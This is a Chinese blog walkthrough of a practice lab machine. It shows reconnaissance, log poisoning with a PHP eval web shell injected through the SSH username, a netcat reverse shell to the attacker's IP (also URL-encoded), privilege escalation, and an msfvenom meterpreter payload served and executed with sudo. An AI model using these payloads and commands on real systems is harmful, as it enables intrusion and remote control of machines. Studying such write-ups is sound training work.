2020-12-04

最新推荐文章于 2024-07-14 21:53:39 发布
最新推荐文章于 2024-07-14 21:53:39 发布
阅读量814 收藏
点赞数
分类专栏: 靶场 文章标签: linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wahhh123admin/article/details/110646171
版权

这里是引用

&&信息收集&&

首先ip收集
nmap 192.168.99.0/24
在这里插入图片描述
再来查看详细信息和是否有隐藏端口
nmap -A -p- 192.168.99.15
好像没有隐藏的端口,靶机开放两个端口,靶机系统为Ubuntu,apache服务器
在这里插入图片描述
目录扫描
dirb
dirb http://192.168.99.15 /usr/share/wordlists/dirb/big.txt
在这里插入图片描述
并未发现什么有价值的目录

&&渗透&&

访问页面
在这里插入图片描述
可能存在文件包含
根据它开启的服务,我们查看其的日志(ssh的)
在这里插入图片描述
然后我们使用一句话木马来进行名字替代
ssh ‘<?php eval($_GET['cmd']);?>’@192.168.99.15
在这里插入图片描述
bp的包在路径后面加上a=phpinfo();测试一下,成功
在这里插入图片描述
加上cmd参数在重新发包一下
在这里插入图片描述
执行成功
在这里插入图片描述

获取shell
mknod backpipe p && nc 测试机IP 监听端口 0<backpipe | /bin/bash 1>backpipe在这里插入代码片
记得url编码
mknod+backpipe+p+%26%26+nc+192.168.99.6+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe
在这里插入图片描述
shell反弹成功
在这里插入图片描述
交互式命令
python -c ‘import pty;pty.spawn("/bin/bash")’
在这里插入图片描述
貌似权限不太足
提取
awk ‘BEGIN{system("/bin/bash")}’
在这里插入图片描述
root提取
在这里插入图片描述
提权
创建个木马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.99.6 LPORT=8888 -f elf > shell.elf
在这里插入图片描述
将木马移动到www目录下
在这里插入图片描述
切换到/var/www/html
在这里插入图片描述
开启apache服务
在这里插入图片描述
靶机木马下载,成功
在这里插入图片描述
给予权限
在这里插入图片描述
msfconsole监听
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.99.6
set lport 8888
run
在这里插入图片描述

靶机运行木马
sudo ./xxxlogauditorxxx.py
/var/log/auth.log|./shell.elf
在这里插入图片描述

提权成功
在这里插入图片描述

wahhh123admin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020-12-02
north_gk的博客
12-02 616
3.创建并执行满足下列要求的存储过程。 1)查询经济性质为私营的每个法人银行贷款的总金额和平均金额。 2)查询只在指定银行贷过款的法人的名称。要求银行名称为输人参数,默认值为“工商银行北京A支行”,如果指定的银行不存在,则显示“指定的银行不存在”。 3)删除指定法人在指定日期前的贷款记录。要求法人名称和日期为输人参数,并加密此存储过程的定义。 4)查询在指定银行贷过款且贷款金额高于此银行的平均贷款金额的法人的名称、贷款日期和贷款金额。要求银行名称为输人参数,如果指定的银行不存在,则显示“指定的银行不
2020-12-06
qq_53040634的博客
12-06 3011
标题:对于红外循迹小车的进一步认知、组装、与实验运行。 1.对于模块的重新准备。 这次选择了更加便捷的四路循迹模块。 2.四路循迹模块安装原理图示 3.l289n电机安装同上期一样,需要空出循迹模块的安装位置进行相同的接线。 4. (1)烧录的程序 #-- coding:UTF-8 -- import RPi.GPIO as GPIO import time #小车电机引脚定义 IN1 = 20 IN2 = 21 IN3 = 19 IN4 = 26 ENA = 16 ENB = 13 #小车按键定义
push参数
lvlemo的博客
11-20 8765
this.$router.push({ name:'forgetCodeTwoModule', params:{ result:response } }) {{this.$route.params.resu
apns详细过程
freezing_yu的专栏
11-15 1483
https://developer.apple.com/library/ios/#documentation/NetworkingInternet/Conceptual/RemoteNotificationsPG/IPhoneOSClientImp/IPhoneOSClientImp.html#//apple_ref/doc/uid/TP40008194-CH103-SW1     在项目的
00.JavaScript基础
a2274001782的博客
07-15 7754
0o.参考资料 js:https://codeofli.github.io/2019/11/js-note/javaScript/javaScript/ vue:https://codeofli.github.io/2019/11/js-note/vue/vue/ jquery:https://codeofli.github.io/2019/10/js-note/jquery/jquery/ 整理好的书面文档:https://zh.javascript.info/ 01.网课内容 00.JS的简介与历史
ffmpeg推流命令
superlion219的专栏
07-08 880
hls 推流mp4到HLS ffmpeg -loglevel verbose -re -i xiaopingguo.mp4 -vcodec libx264 -vprofile baseline -acodec aac -ar 44100 -strict -2 -ac 1 -f flv -s 1280*720 -q 10 rtmp://ip:1935/hls/ 直播HLS ffplay http://ip:8080/hls/index.m3u8 rtmp 推流avi到rtmp ffmpeg -lo...
android push机制-C2DM
sym19862006的专栏
06-27 1354
http://bigcat.easymorse.com/?p=1210       参考http://code.google.com/intl/zh-CN/android/c2dm/index.html#intro android2.2以上支持,支持第三方应用程序的push。实现令人心动的消息push,GMail就是这么实现的,收信的速度比网页还快。 Components: 1,移动设备:...
gmall2020-mock-log-2020-04-01.jar
12-30
用户行为日志生成脚本
lab4-websockets:实验4。WebSockets。 截止日期2020-12-04
02-12
Web工程2020-2021 / Websockets 在此分配中,您的PR必须仅修改README.md文件。 请访问 ,以获取此作业的说明。历史背景该代码实现了系统的DOCTOR脚本,并为您提供了一个客户端和服务器,它们通过websocket相互通信。...
2020-04-25
01-06
胎压异常处理 安吉交运问题排查 现场排查了4辆 第一辆车,仪表显示“胎压异常”和“胎压信号异常”,左前、右前、右后外轮...第三辆车,在12点左右仪表显示有4个轮胎气压在10.3Bar左右,有一个轮胎报警,在14:30出车,
提交、push代码的命令
panying941206的博客
03-05 1740
使用git 命令上传文件
vue实现PS效果,鼠标拖拽指令、十字辅助线、鼠标选点、打印页面指定内容、生成随机id、颜色选择器、div上输入文字(类似QQ截图输入文字)、vue图片上传转base64...
热门推荐
大香蕉的博客
12-08 10万+
vue实现PS效果,鼠标拖拽指令、十字辅助线、鼠标选点、打印页面指定内容、生成随机id、颜色选择器、div上输入文字(类似QQ截图输入文字)、vue图片上传转base64...
Vue Router 嵌套路由实例
yan101795的博客
12-14 1323
Vue Router 嵌套路由实例前言一、目录二、步骤main.jsindex.htmlApp.vueindex.js五个路由组件 效果如下: 前言 更新视图但不重新请求页面,是前端路由原理的核心之一。接下来实现一个简单嵌套路由的功能,并贴上代码。准备工作请参考前面几篇博客。共有五个路由组件,分别为:About.vue、Home.vue、News.vue、Message.vue、MessageDetail.vue。 其中App是根组件,包括About.vue和Home.vue两个路由组件,而Home.
pushd命令
weixin_34337381的博客
12-11 940
1)功能pushd命令常用于将目录加入到栈中,加入记录到目录栈顶部,并切换到该目录;若pushd命令不加任何参数,则会将位于记录栈最上面的2个目录对换位置2)语法(1)格式:pushd  [目录 | -N | +N]   [-n](2)选项目录   将该目录加入到栈顶,并执行"cd 目录",切换到该目录+N   将第N个目录移至栈顶(从左边数起,数字从0开始)-N    将第N个目录移至栈顶(从右...
pushd命令使用
bobocheng的专栏
04-07 2万+
pushdSave and then change the current directory. With no arguments, pushd exchanges the top two directories.SYNTAXpushd [dir | +N | -N] [-n] KEY+N Brings the Nth directory (counting from the
接着探索Linux的世界 -- 基本指令(文件查看、时间相关、打包压缩等等)
最新发布
weixin_73359101的博客
07-14 1299
命令输出到某个指定文件中,而不是输出到终端屏幕或终端窗口。我们从键盘输入什么,cat命令就打印什么。命令 + >> + 目标文件名。: 将命令的结果写入目标文件中;这两条指令的作用等价。
用XML描述下列数据。杰普学号01 男 2020-12-18 杰普学号02 男 2020-12-18 杰普学号03 男 2020-12-18 杰普学号042020-12-18 杰普学号05 女 2020-12-18
03-07
<?xml version="1." encoding="UTF-8"?> <id>01 男 <date>202-12-18 <id>02 ... <date>202-12-18 ... <date>202-12-18 ... <id>04 男 <date>202-12-18 <id>05 女 <date>202-12-18 </students>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值